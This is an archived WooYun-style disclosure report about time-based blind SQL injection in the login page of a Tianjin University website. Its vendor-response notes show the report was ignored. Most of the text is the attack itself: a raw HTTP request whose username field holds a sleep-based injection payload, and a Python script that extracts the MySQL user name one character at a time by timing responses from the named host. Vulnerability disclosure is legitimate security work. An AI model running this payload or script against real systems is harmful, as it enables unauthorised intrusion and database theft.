乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-29: 细节已通知厂商并且等待厂商处理中 2015-11-30: 厂商已经主动忽略漏洞,细节向公众公开
POST /transact_user.php HTTP/1.1Content-Length: 201Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://work.tju.edu.cnCookie: PHPSESSID=b473503db0314de5350b559908bee830Host: work.tju.edu.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*action=%e7%99%bb%20%20%e5%bd%95&password=g00dPa%24%24w0rD&username='XOR(if(now()=sysdate(),sleep(if(greatest(length(user()),1)=23,3,0)),0))OR'
user长度为23:
#encoding=utf-8import httplibimport timeimport stringimport sysimport randomimport urllibheaders = {'Content-Type':'application/x-www-form-urlencoded'}payloads = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.')print '[%s] Start to retrive MySQL User:' % time.strftime('%H:%M:%S', time.localtime())user = ''for i in range(1, 24): for payload in payloads: s = "'XOR(if(now()=sysdate(),SLEEP(IF(mid(user(),%s,1)='%s',10,0)),0))OR'" % (i, payload) s = "action=%e7%99%bb%20%20%e5%bd%95&password=g00dPa&username="+s conn = httplib.HTTPConnection('work.tju.edu.cn', timeout=90) start_time = time.time() conn.request('POST','/transact_user.php',s,headers) h=conn.getresponse().read() conn.close() print '.', #print time.time() - start_time if time.time() - start_time > 10.0: user += payload print '\n\n[in progress]', user, break print '\n[Done] MySQL user is %s' % user
危害等级:无影响厂商忽略
忽略时间:2015-11-30 08:50
大哥,这不是我们学校的漏洞。这个是天津大学的网站。
暂无